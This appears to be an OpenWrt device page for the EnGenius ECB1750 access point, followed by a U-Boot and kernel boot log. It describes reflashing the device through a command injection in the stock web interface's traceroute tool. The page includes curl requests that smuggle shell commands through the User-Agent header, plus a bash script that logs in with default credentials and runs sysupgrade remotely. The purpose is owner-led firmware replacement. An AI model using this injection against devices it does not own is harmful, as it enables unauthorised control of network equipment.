Содержание
Engenius ecb1750
I have used several methods of installing openwrt onto the ECB1750 (writing the flash over spi with a programmer, tftp, web ui exploitation).
All of these methods are pretty generic and straight forward except oddly enough the most accessible one.
I am going to start by outlining how the exploit I found works. It is a pretty normal command injection vuln for the most part.
The stock firmware is already running an Attitude Adjustment build of OpenWrt along with the proprietary Qualcomm Atheros drivers.
Which in of itself is fine… but for whatever reason they dulled down LuCI to the point where the AP is barely usable as one.
Knowing that the device is running OpenWrt helps with understanding the structure of the stock firmware. I just had to find a way to poke at it…
Digging around I found that most if not all of the tools listed under “Management>Tools” on the stock firmware filters the user input using client side js.
Starting from the ‘Traceroute’ tab I captured a request from pressing the ‘Start’ button using the Firefox inspector and then I copied it out as a curl command which gave me:
curl 'http://192.168.1.164/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diag_traceroute/127.0.0.1' -H 'Host: 192.168.1.164' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20220101 Firefox/42.0' -H 'Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Referer: http://192.168.1.164/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diagnostics?tab=traceroute' -H 'Cookie: sysauth=2ed278385aaf32fb88c85388a86d533b' -H 'Connection: keep-alive'
When this is executed it returns something like this:
traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 38 byte packets 1 127.0.0.1 0.039 ms
Now we have a way to poke at this function from the command like without javascript gumming up the works.
Lets tack a command onto the end of the address to see what happens.
curl 'http://192.168.1.164/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diag_traceroute/127.0.0.1$(env)' -H 'Host: 192.168.1.164' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20220101 Firefox/42.0' -H 'Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Referer: http://192.168.1.164/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diagnostics?tab=traceroute' -H 'Cookie: sysauth=2ed278385aaf32fb88c85388a86d533b' -H 'Connection: keep-alive'
Which returns something like:
traceroute: bad address '127.0.0.1GATEWAY_INTERFACE=CGI/1.1 REMOTE_ADDR=192.168.1.30 QUERY_STRING=_=0.19077395883423587 HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20220101 Firefox/42.0 DOCUMENT_ROOT=/www/ REMOTE_PORT=58438 HTTP_ACCEPT=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 CONTENT_LENGTH=0 SCRIPT_FILENAME=/www/cgi-bin/luci HTTP_HOST=192.168.1.164 REQUEST_URI=/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diag_traceroute/127.0.0.1$(env) SERVER_SOFTWARE=lighttpd/1.4.30 HTTP_CONNECTION=keep-alive HTTP_COOKIE=sysauth=2ed278385aaf32fb88c85388a86d533b HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5 HTTP_REFERER=http://192.168.1.164/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diagnostics?tab=traceroute SERVER_PROTOCOL=HTTP/1.1 HTTP_ACCEPT_ENCODING=gzip, deflate PATH_INFO=/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diag_traceroute/127.0.0.1$(env) REDIRECT_STATUS=200 REQUEST_METHOD=GET SERVER_ADDR=0.0.0.0 PWD=/www/cgi-bin SERVER_PORT=80 SCRIPT_NAME=/cgi-bin/luci SERVER_NAME=192.168.1.164'
Sweet, Sweet shell injection…Now what can we do with this?
Turns out as-is not much because the server side wont allow any space characters to be passed through the request.
This means that ‘ls’ will execute fine but ‘ls -la’ will return:
<?xmlversion="1.0"encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><htmlxmlns="http://www.w3.org/1999/xhtml"xml:lang="en"lang="en"><head><title>400 - Bad Request</title></head><body><h1>400 - Bad Request</h1></body></html>
So what can we do about this?
Well…remember before when we issued the ‘env’ command? Check its output…you might see it…
Thats right. The user agent is set as a variable for the executing shell.
This means that while the server rejects ‘../127.0.0.1$(ls -la)’ because it contains a space character ‘../127.0.0.1$($HTTP_USER_AGENT)’ will pass just fine.
So lets leverage this to execute ‘ls -la’ just to see:
curl 'http://192.168.1.164/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diag_traceroute/127.0.0.1$($HTTP_USER_AGENT)' -H 'Host: 192.168.1.164' -H 'User-Agent: ls -la' -H 'Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Referer: http://192.168.1.164/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diagnostics?tab=traceroute' -H 'Cookie: sysauth=2ed278385aaf32fb88c85388a86d533b' -H 'Connection: keep-alive'
If that returns something like this:
traceroute: bad address '127.0.0.1drwxr-xr-x 2 root root 27 Aug 11 08:40 . drwxr-xr-x 4 root root 398 Aug 11 08:40 .. -rwxr-xr-x 1 root root 135 Jan 27 2022 luci'
Then you have just successfully leveraged the vulnerability to execute shell code at the level needed to replace the system firmware.
The Manual Way – needs: sysauth, stok (!!)
If you opt for the long way you should read the above section titled “OEM firmware exploitation”. This is purely instructional.
We need to complete 3 steps to replace the AP‘s firmware.
save the sysupgrade file to “/tmp”.
run a minimal local webserver with python. Abort with <CTRL> <C>.
$ cd /tmp $ python -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ... <CTRL> <C> $
run ‘sysupgrade’ and download directly the firmware
curl 'http://192.168.1.10/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diag_traceroute/127.0.0.1$($HTTP_USER_AGENT)' -H 'Host: 192.168.1.10' -H 'User-Agent: sysupgrade -F -n -v http://192.168.1.10/openwrt-ath79-generic-engenius_ecb1750-squashfs-sysupgrade.bin' -H 'Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Referer: http://192.168.1.10/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diagnostics?tab=traceroute' -H 'Cookie: sysauth=2ed278385aaf32fb88c85388a86d533b' -H 'Connection: keep-alive'
The Short Way:
You need a local web server or wan connection.
Save the sysupgrade file to “/tmp”.
Run a minimal local webserver with python. Abort with <CTRL> <C>.
$ cd /tmp $ python -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ... <CTRL> <C> $
Run this Script and wait a minute to complete sysupgrade/reboot..
$ bash ecb1750.sh (..) $
ecb17250.sh:
#!/bin/bash ################# Instructions ################### ECB1750 Access Point: 192.168.1.1 (default admin:admin)# client: 192.168.1.10## 1.) change login credential ($__USERNAME, $__PASSWORD) and ip address ($__AP_IP) according your access point settings## 2.) setup a local webserver serving the openwrt sysupgrade file# 2.1) download "openwrt-ath79-generic-engenius_ecb1750-squashfs-sysupgrade.bin" or newer to "/tmp"# 2.2) start a simple webserver on port 8080 (no root privs needed):# $ cd /tmp# $ python -m SimpleHTTPServer 8080## 3.) change $__UPGRADE_URI_FILE pointing to your webserver## 4.) run script..# $ bash ecb1750.sh## 5.) wait a minute to complete sysupgrade and# ############ Exploit ############## we need to catch the cookie (sysauth) and luci security token (stok)# sysauth and stok are always different strings## 1.) login onto the webinterface# => http://192.168.1.1/ (full path: http://192.168.1.1/cgi-bin/luci/)## 2.) afterwards a cookie will be created containing a random string "sysauth=7f105ab35ee7676d14a6ca446fac2c72" - check browser developer tools## 3.) you will be redirected to "http://192.168.1.1/cgi-bin/luci/;stok=773b0d54a4a14fec324c687e1dd8f61b/admin/" - we need the stok string## 4.) under "management" => "tools" you can run traceroute# => http://192.168.1.1/cgi-bin/luci/;stok=773b0d54a4a14fec324c687e1dd8f61b/admin/network/diag_traceroute/127.0.0.1## 5.) add command at the end without whitespaces# => http://192.168.1.1/cgi-bin/luci/;stok=773b0d54a4a14fec324c687e1dd8f61b/admin/network/diag_traceroute/127.0.0.1$(env)## 6.) use HTTP_USER_AGENT to inject command# __USERNAME="admin"__PASSWORD="admin"__AP_IP=192.168.1.1 __UPGRADE_URI_FILE="http://192.168.1.10:8080/openwrt-ath79-generic-engenius_ecb1750-squashfs-sysupgrade.bin" __COOKIE_FILE="/tmp/.ecb1750.cookie.$$" if[!-x/usr/bin/curl ]; then"error: "curl" not found."; exit1; fi ## cookie output:## # Netscape HTTP Cookie File# # https://curl.haxx.se/docs/http-cookies.html# # This file was generated by libcurl! Edit at your own risk.## # 192.168.1.1 FALSE /cgi-bin/luci/ FALSE 0 sysauth 7f105ab35ee7676d14a6ca446fac2c72## echo"connecting: ${__AP_IP}. username: ${__USERNAME}. password: ${__PASSWORD}." __STOK_AUTH=$( curl --max-time10-s-d"username=${__USERNAME}"-d"password=${__PASSWORD}"--cookie-jar"${__COOKIE_FILE}" http://${__AP_IP}/cgi-bin/luci |awk -F/'/var url/{print $4}') if[-z"${__STOK_AUTH}"]thenecho"error: variable "__STOK_AUTH" empty."exit1elseecho"STOK_AUTH: ${__STOK_AUTH}"fi if[!-f"${__COOKIE_FILE}"]thenecho"error: cookie file "${__COOKIE_FILE}" empty."exit1fi __COOKIE_SYSAUTH=$(awk -F '/^'$__AP_IP'/{print $7}'; <"${__COOKIE_FILE}") if[-z"${__COOKIE_SYSAUTH}"]thenecho"error: variable "__COOKIE_SYSAUTH" empty."exit1elseecho"COOKIE_SYSAUTH: ${__COOKIE_SYSAUTH}"fi echo"running command: sysupgrade -F -n -v ${__UPGRADE_URI_FILE}" curl 'http://192.168.1.1/cgi-bin/luci/'${__STOK_AUTH}'/admin/network/diag_traceroute/127.0.0.1$($HTTP_USER_AGENT)' -H'Host: '${__AP_IP}'' -H'User-Agent: sysupgrade -F -n -v '${__UPGRADE_URI_FILE}'' -H'Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8' -H'Accept-Language: en-US,en;q=0.5' -H'Accept-Encoding: gzip, deflate' -H'Cookie: sysauth='${__COOKIE_SYSAUTH}'' -H'Connection: keep-alive' -H'Referer: http://'${__AP_IP}'/cgi-bin/luci/'${__STOK_AUTH}'/admin/network/diagnostics?tab=traceroute' rm"${__COOKIE_FILE}"
→ Basic configuration After flashing, proceed with this.
Set up your Internet connection, configure wireless, configure USB port, etc.
NOTE: As a beginner, you really should inform yourself first about soldering in general, and then obtain some practical experience, before doing anything to your device that you’ll later regret!
ECB1200_1750 – Scorpion 1.0DRAM:
sri
Scorpion 1.0
ath_ddr_initial_config(200): (32bit) ddr2 init
tap = 0x00000003
Tap (low, high) = (0x4, 0x1a)
Tap values = (0xf, 0xf, 0xf, 0xf)
128 MB
Top of RAM usable for U-Boot at: 88000000
Reserving 216k for U-Boot at: 87fc8000
Reserving 192k for malloc() at: 87f98000
Reserving 44 Bytes for Board Info at: 87f97fd4
Reserving 36 Bytes for Globata at: 87f97fb0
Reserving 128k for boot params() at: 87f77fb0
Stack Pointer at: 87f77f98
Now running in RAM – U-Boot at: 87fc8000
Flash Manuf Id 0xc2, DeviceId0 0x20, DeviceId1 0x18
flash size 16MB, sector count = 256
Flash: 16 MB
*** Warning *** : 2nd PCIe WLAN Module not found !!!
In: serial
Out: serial
Err: serial
Net: ath_gmac_enet_initialize…
athrs_sgmii_res_cal: cal value = 0x1
Fetching MAC Address from 0x87feb810
ath_gmac_enet_initialize: reset mask:c02200
Scorpion —-> AR8035 PHY *
AR8035 PHY init
: cfg1 0xf cfg2 0x7135
eth0: 88:dc:96:39:d9:a1
ATHR8035_PHY: Phy 5, Neg Success
ATHR8035_PHY: unit 0 phy addr 5 eth0 up
eth0
Setting 0x18116290 to 0x58b1a14f
Hit any key to stop autoboot: 0
## Booting image at 9f050000 …
Image Name: MIPS OpenWrt Linux-3.3.8
Created: 2022-08-11 8:46:21 UTC
Image Type: MIPS Linux Kernel Image (lzma compressed)
Data Size: 10 Bytes = 1016.1 kB
Load Address: 80060000
Entry Point: 80060000
Verifying Checksum at 0x9f050040 …OK
Uncompressing Kernel Image … OK
No initrd
## Transferring control to Linux (at address 80060000) …
## Giving linux memsize in bytes, 134217728
Starting kernel …
[ 0.000000] Linux version 3.3.8 ([email protected]) (gcc version 4.6.3 20220201 (prerelease) (Linaro GCC 4.6-2022.02) ) #1 Tue Aug 11 16:45:47 CST 2022
[ 0.000000] bootconsole [early0] enabled 0.000000] CPU revision is: 00019750 (MIPS 74Kc)
[ 0.000000] SoC: Qualcomm Atheros QCA9558 rev 0 0.000000] Clocks: CPU:720.000MHz, DDR:600.000MHz, AHB:200.000MHz, Ref:40.000MHz
[ 0.000000] Determined physical RAM map:
0.000000] memory: 08000000 @ 00000000 (usable)
[ 0.000000] Initrd not found or empty – disabling initrd
[ 0.000000] Zone PFN ranges:
[ 0.000000] Normal 0x00000000 -> 0x00008000
[ 0.000000] Movable zone start PFN for each node
[ 0.00 Early memory PFN ranges
[ 0.000000] 0: 0x00000000 -> 0x00008000
[ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 32512
[ 0.000000] Kernel command line: board=ECB1750 console=ttyS0,115200 mtdparts=spi0.0:256k(u-boot),64k(u-boot-env),1(kernel),14272k(rootfs),320k(userconfig),64k(art),[email protected](firmware) rootfstype=squashfs,jffs2 ntrd
[ 0.000000] PID hash table entries: 512 (order: -1, 2048 bytes)
[ 0.000000] Dentry cache hash table entries: 16384 (order: 4, 65536 bytes)
[ 0.000000] Inode-cache hash table entries: 8192 (order: 3, 32768 bytes)
[ 0.000000] Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
[ 0.000000] Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
[ 0.000000] Writing ErrCtl register=00000000
[ 0.000000] Readback ErrCtl register=00000000
[ 0.000000] Memory: 126296k/131072k available (2216k kernel code, 4776k reserved, 581k data, 212k init, 0k highmem)
[ 0.000000] SLUB: Genslabs=9, HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[ .000000] NR_IRQS:51
[ 0.000000] Calibrating delay loop… 358.80 BogoMIPS (lpj=1794048)
[ 0.060000] pid_max: default: 32768 minimum: 301
[ 0.060000] Mount-cache hash table entries: 512
[ 0.070000] Initialized recycle list for cpu 0.
[ 0.070000] NET: Registered protocol family 16
[ 0.080000] gpiochip_add: registered GPIOs 0 to 23 on device: ath79
[ 0.080000] MIPS: machine is Senao ECB1750
[ 0.090000] registering PCI controller with io_map_base unset
[ 0.100000] ar724x-pci ar724x-pci.1: PCIe link is down
[ 0.100000] registering PCI controller with io_map_base unset
[ 0.310000] bio: create slab <bio-0> at 0
[ 0.320000] PCI host bridge to bus 0000:00
[ 0.320000] pci_bus 0000:00: root bus resource [mem 0x10000000-0x11ffffff]
[ 0.330000] pci_bus 0000:00: root bus resource [io 0x0000]
[ 0.330000] pci:00:00.0: invalid calibration data
[ 0.340000] pci 0000:00:00.0: BAR 0: assigned [mem 0x10000000-0x101fffff 64bit]
[ 0.340000] pci 0000:00:00.0: BAR 6: assigned [mem 0x10200000-0x1020ffff pref]
[ 0.350000] PCI host bridge to bus 0000:01
[ 0.350000] pci_bus 0000:01: root bus resource [x12000000-0x13ffffff]
[ 0.360000] pci_bus 0000:01: root bus resource [io 0x0001]
[ 0.360000] pci 0000:00:00.0: using i for pin 1
[ 0.370000] Switching to clocksource MIPS
[ 0.370000] NET: Registered protocol family 2
[ 0.380000] IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.380000] TCP established hash table entries: 4096 (order: 3, 32768 bytes)
[ 0.390000] TCP bind hash table entries: 4096 (order: 2, 16384 bytes)
[ 0.390000] TCP: Hash tablonfigured (established 4096 bind 4096)
[ 0.400000] TCP reno registered
[ 0.400000] UDP hash taentries: 256 (order: 0, 4096 bytes)
[ 0.410000] UDP-Lite hash table entries: 256 (order: 0, 4096 )
[ 0.410000] NET: Registered protocol family 1
[ 0.430000] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[ 0.430000] JFFS2 version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
[ 0.440000] msgmni has been set to 246
[ 0.450000] io scheduler noop registered
[ 0.450000] io scheduler deadline registered (default)
[ 0.460000] Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled
[ 0.480000] serial8250.0: ttyS0 at MMIO 0x18020000 (irq = 11) is a 16550A
[ 0.490000] console [ttyS0] enabled, bootconsole disabled
[ 0.490000] console [ttyS0] enabled, bootconsole disabled
[ 0.500000] m25p80 spi0.0: found mx25l12805d, expected m25p80
[ 0.510000] m25p80 spi0.0: mx25l12805d (16384 Kbytes)
[ 0.510000] 7 cmdlinepart partitions found on MTD device spi0.0
[ 0.520000] Creating 7 MTD partitions on “spi0.0”:
[ 0.530000] 0x000000000000-0x000000040000 : “u-boot”
[ 0.530000] 0x000000040000-0x000000050000 : “u-boot-env”
[ 0.540000] 0x000000050000-0x0000001b0000 : “kernel”
[ 0.540000] 0x0000001b0000-0x000000fa0000 : “rootfs”
[ 0.550000] mtd: partition “rootfs” set to be root filesystem
[ 0.560000] mtd: partition “rootfs_data” created automatically, ofs=810000, len=790000
[ 0.560000] 0x000000810000-0x000000fa0000 : “rootfs_data”
[ 0.570000] 0x000000fa0000-0x000000ff0000 : “userconfig”
[ 0.580000] 0x000000ff0000-0x000001000000 : “art”
[ 0.580000] 0x000000050000-0x000000fa0000 : “firmware”
[ 0.590000] /proc/Lan_Led created
[ 0.610000] ag71xx_mdio: probed
[ 0.610000] eth0: Atheros AG71xx at 0xb9000000, irq 4
[ 1.170000] ag71xx ag71xx.0: eth0: connected to PHY at ag71xx-mdio.0:05 [uid=004dd072, driver=Generic PHY]
[ 1.180000] GACT probability on
[ 1.180000] Mirror/redirect action on
[ 1.180000] u32 classifier
[ 1.190000] Performance counters on
[ 1.190000] input device check on
[ 1.190000] Actions configured
[ 1.200000] ip_tables: (C) 2000-2006 Netfilter Core Team
[ 1.200000] TCP bic registered
[ 1.210000] TCP cubic registered
[ 1.210000] TCP westwood registered
[ 1.210000] TCP highspeed registered
[ 1.220000] TCP hybla registered
[ 1.220000] TCP htcp registered
[ 1.220000] TCP vegas registered
[ 1.230000] TCP veno registered
[ 1.230000] TCP scalable registered
[ 1.230000] TCP lp registered
[ 1.240000] TCP yeah registered
[ 1.240000] TCP illinois registered
[ 1.240000] NET: Registered protocol family 17
[ 1.250000] Bridge firewalling registered
[ 1.250000] 8021q: 802.1Q VLAN Support v1.8
[ 1.260000] VFS: Mounted root (squashfs filesystem) readonly on device 31:3.
[ 1.270000] Freeing unused kernel memory: 212k freed
– preinit –
Press the [f] key and hit [enter] to enter failsafe mode
[ 6.170000] eth0: link up (1000Mbps/Full duplex)
– regular preinit –
[ 6.350000] JFFS2 notice: (434) jffs2_build_xattr_subsystem: complete building xattr subsystem, 1 of xdatum (0 unchecked, 0 orphan) and 19 of xref (0 dead, 2 orphan) found.
switching to jffs2
– init –
[ 6.420000] eth0: link down
Please press Enter to activate this console. [ 7.900000] NET: Registered protocol family 10
[ 8.010000] asf: module license ‘Proprietary’ taints kernel.
[ 8.010000] Disabling lock debugging due to kernel taint
[ 8.030000] ****Address of trace_timer :8702a610
[ 8.330000] ath_hal: 0.9.17.1 (AR5416, AR9380, REGOPS_FUNC, WRITE_EEPROM, TX_DATA_SWAP, RX_DATA_SWAP, 11D)
[ 8.350000] ath_rate_atheros: Copyright (c) 2001-2005 Atheros Communications, Inc, All Rights Reserved
[ 8.370000] ath_dfs: Version 2.0.0
[ 8.370000] Copyright (c) 2005-2006 Atheros Communications, Inc. All Rights Reserved
[ 8.520000] ath_dev: Copyright (c) 2001-2007 Atheros Communications, Inc, All Rights Reserved
[ 10.610000] __ath_attach: Set global_scn[0]
[ 10.620000] Enterprise mode: 0x23fc0000
[ 10.630000] Restoring Cal data from DRAM
[ 10.630000]
[ 10.630000] ART Version : 10.347
[ 10.630000] SW Image Version : 0.20.-30.2.5
[ 10.640000] Board Revision : 6
[ 10.640000] ar9300_attach: nf_2_nom -110 nf_2_max -60 nf_2_min -125
[ 10.650000]
[ 10.650000] [5G A/N] scn_handle->scn_disable_band=1,[0,0,0,1]
[ 10.660000] Green-AP : Green-AP : Attached
[ 10.660000]
[ 10.670000] ath_get_caps[6195] rx chainmask mismatch actual 7 sc_chainmak 0
[ 10.680000] ath_get_caps[6170] tx chainmask mismatch actual 7 sc_chainmak 0
[ 10.680000] ath_attach_dfs[12718] dfsdomain 1
[ 10.700000] wifi0: Atheros ???: mem=0xb8100000, irq=47
[ 10.710000] ath_pci: SmartAntenna-DRT-0.1 (Atheros/multi-bss)
[ 10.720000] ath_pci_probe
[ 10.720000] PCI device id is 003c :003c
[ 10.720000] ath_pci 0000:00:00.0: BAR 0: assigned [mem 0x10000000-0x101fffff 64bit]
[ 10.730000] PCI: Enabling device 0000:00:00.0 (0000 -> 0002)
[ 10.740000] ath_pci 0000:00:00.0: ath DEBUG: sc=0x87ac9600
[ 10.740000]
[ 10.740000] ol_ath_pci_configure : num_desired MSI set to 0
[ 10.750000]
[ 10.750000] Using PCI Legacy Interrupt
[ 11.750000] CE_per_engine_handler_adjust, base=87ac9600 offset=00057400
[ 11.750000] CE_per_engine_handler_adjust, base=87ac9600 offset=00057800
[ 11.770000] __ol_ath_attach: ath_attach TODO
[ 11.770000] __ol_ath_attach: dev name wifi1
[ 11.780000] ol_ath_set_default_tgt_config : AC Minfree buffer allocation through module param (umac.ko)
[ 11.790000] OL_ACBKMinfree : 0
[ 11.790000] OL_ACBEMinfree : 0
[ 11.790000] OL_ACVIMinfree : 0
[ 11.800000] OL_ACVOMinfree : 0
[ 11.800000] ol_ath_attach() BMI inited.
[ 11.810000] ol_ath_attach() BMI Get Target Info.
[ 11.810000] ol_ath_attach() TARGET TYPE: 7 Vers 0x4100016c
[ 11.820000] NUM_DEV=1 FWMODE=0x2 FWSUBMODE=0x0 FWBR_BUF 0
[ 11.820000] ol_ath_attach() configure Target .
[ 11.830000] qc98xx_verify_checksum: flash checksum passed: 0xcab0
[ 11.830000]
[ 11.830000] ========== ac_obey_reg_power = 0
[ 11.840000] qc98xx_verify_checksum: flash checksum passed: 0xe490
[ 11.840000] ol_transfer_bin_file 2337: Download DRAM data len 2116
[ 11.850000] ol_ath_download_firmware: cal_in_flash=0, ATH_DRAM_DATA_FILE status=0
[ 11.860000] Download AR9888v2_bin
[ 11.870000] ol_transfer_bin_file 2193: Download Firmware data len 235576
[ 12.870000] ol_ath_attach() Download FW.
[ 12.880000] ol_ath_attach() HT Create .
[ 12.880000] ol_ath_attach() HIF Claim.
[ 12.880000] ol_ath_attach() BMI Done.
[ 12.890000] ol_ath_attach() WMI attached. wmi_handle 86300000
[ 12.890000] HWT
[ 12.900000] SOC_RESET_CONTROL_ADDRESS : 800
[ 12.900000] CPU_INTR_ADDRESS = [0]
[ 12.900000] SOC_GLOBAL_RESET_ADDRESS = [0]
[ 12.910000] Rx_Filter : [0]
[ 12.910000] CE_per_engine_handler_adjust, base=87ac9600 offset=00057400
[ 12.920000] CE_per_engine_handler_adjust, base=87ac9600 offset=00057800
[ 12.920000] CE_per_engine_handler_adjust, base=87ac9600 offset=00057c00
[ 12.930000] CE_per_engine_handler_adjust, base=87ac9600 offset=00058000
[ 12.940000] CE_per_engine_handler_adjust, base=87ac9600 offset=00058400
[ 12.950000] CE_per_engine_handler_adjust, base=87ac9600 offset=00058800
[ 12.960000] CE_recv_buf_enqueue 654 Populate last entry 512 for CE 5
[ 12.960000] CE_recv_buf_enqueue 663 CE 5 wi 511 dest_ptr 0x5c9d040 nbytes 0 recv_ctxt 0x864729c0
[ 12.970000] Target:87171000 HTC Service:0x0001, ULpipe:0 DLpipe:1 id:0 Ready
[ 12.980000] -HWT
[ 12.980000] Target:87171000 HTC Service:0x0300, ULpipe:4 DLpipe:5 id:1 Ready
[ 12.990000] HTC Service:0x0300 ep:1 TX flow control disabled
[ 12.990000] CE_pkt_dl_len_set CE 4 Pkt download length 64
[ 13.000000] ol_txrx_pdev_attach: 1424 tx desc’s allocated ; range starts from 85900000
[ 13.010000] Target:87171000 HTC Service:0x0100, ULpipe:3 DLpipe:2 id:2 Ready
[ 13.020000] HTC Service:0x0100 ep:2 TX flow control disabled
[ 13.020000] wmi_service_ready_event_rx: WMI UNIFIED SERVICE READY event
[ 13.030000] num_rf_chain : 00000003
[ 13.030000] ht_cap_info: : 0000085b
[ 13.040000] vht_cap_info : 338001b2
[ 13.040000] vht_supp_mcs : 0000ffea
[ 13.040000] LARGE_AP enabled. num_peers 144, num_vdevs 16, num_tids 256, lteu_support 0
[ 13.050000] idx 0 req 1 num_units 0 num_unit_info 2 unit size 440 actual units 145
[ 13.060000] chunk 0 len 63800 requested ,ptr 0x5910000
[ 13.080000] FIRMWARE:P 145 V 16 T 443
[ 13.080000]
[ 13.080000] FIRMWARE:_wlan_rtt_enable
[ 13.090000] wmi_ready_event_rx: WMI UNIFIED READY event
[ 13.090000] ol_ath_connect_htc() WMI is ready
[ 13.100000] ol_ath_set_host_app_area TODO
[ 13.100000] target uses HTT version 2.1; host uses 2.1
[ 13.110000] ol_ath_attach() connect HTC.
[ 13.110000] bypasswmi : 0
[ 13.120000] ol_regdmn_start: reg-domain param: regdmn=0, countryName=, wModeSelect=FFFFFFFF, netBand=FFFFFFFF, extendedChanMode=0.
[ 13.130000]
[ 13.130000] [5G AC] scn_handle->scn_disable_band=1,[0,0,0,1]
[ 13.140000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2) flags 0x2150
[ 13.140000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4) flags 0xa0
[ 13.150000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x8) flags 0xc0
[ 13.160000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x20) flags 0xd0
[ 13.160000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x40) flags 0x150
[ 13.170000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x800) flags 0x10080
[ 13.180000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2000) flags 0x20080
[ 13.190000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4000) flags 0x40080
[ 13.190000] Add VHT80 channel: 5210
[ 13.200000] Add VHT80 channel: 5290
[ 13.200000] Add VHT80 channel: 5530
[ 13.200000] Add VHT80 channel: 5610
[ 13.210000] Add VHT80 channel: 5690
[ 13.210000] Add VHT80 channel: 5775
[ 13.220000] Skipping VHT80 channel 5825
[ 13.220000] ol_ath_phyerr_attach: called
[ 13.220000] OL Resmgr Init-ed
[ 13.230000] Green-AP : Green-AP : Attached
[ 13.230000]
[ 13.230000] Green-AP : Attached
[ 13.240000] ol_if_dfs_setup: called
[ 13.240000] ol_if_dfs_attach: called; ptr=858e5974, radar_info=8707db70
[ 13.250000] ol_ath_rtt_meas_report_attach: called
[ 13.250000] ol_ath_attach() UMAC attach .
[ 13.260000] ol_if_dfs_configure: called
[ 13.260000] ol_if_dfs_configure: FCC domain
[ 13.260000] ol_if_dfs_disable: called
[ 13.270000] ol_ath_attach: Calling ol_if_dfs_configure
[ 13.270000] __ol_ath_attach: init tx/rx TODO
[ 13.280000] __ol_ath_attach: hard_header_len reservation 58
[ 13.500000] nf_conntrack version 0.5.0 (1976 buckets, 7904 max)
[ 13.730000] xt_time: kernel timezone is -0000
[ 13.840000] ip6_tables: (C) 2000-2006 Netfilter Core Team
[ 13.890000] [wifi1] FWLOG: [21774] WAL_DBGID_TX_AC_BUFFER_SET ( 0x3, 0x1e, 0x460, 0x460, 0x0 )
[ 13.900000] [wifi1] FWLOG: [21774] WAL_DBGID_TX_AC_BUFFER_SET ( 0x12, 0x1e, 0x460, 0x460, 0x0 )
[ 13.910000] [wifi1] FWLOG: [21774] WAL_DBGID_TX_AC_BUFFER_SET ( 0x45, 0x1e, 0x460, 0x460, 0x0 )
[ 13.920000] [wifi1] FWLOG: [21774] WAL_DBGID_TX_AC_BUFFER_SET ( 0x67, 0x1e, 0x460, 0x460, 0x0 )
[ 13.930000] [wifi1] FWLOG: [21779] WHAL_ERROR_RECV_STOPPCU ( 0x110298a, 0x3 )
[ 13.930000] [wifi1] FWLOG: [21779] WHAL_ERROR_RESET_PM ( )
[ 13.940000] [wifi1] FWLOG: [21786] WAL_DBGID_DEV_RESET ( 0x1, 0x1, 0x1 )
[ 13.950000] [wifi1] FWLOG: [21978] ANI Enable: 1
[ 13.950000] [wifi1] FWLOG: [21985] WAL_DBGID_DEV_RESET ( 0x1, 0x1, 0x1 )
[ 23.100000] ADDRCONF(NETDEV_UP): eth0: link is not ready
[ 23.120000] device eth0 entered promiscuous mode
[ 23.120000] ADDRCONF(NETDEV_UP): br-lan: link is not ready
[ 23.300000] eth0: link up (1000Mbps/Full duplex)
[ 23.300000] br-lan: port 1(eth0) entered forwarding state
[ 23.310000] br-lan: port 1(eth0) entered forwarding state
[ 23.310000] ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
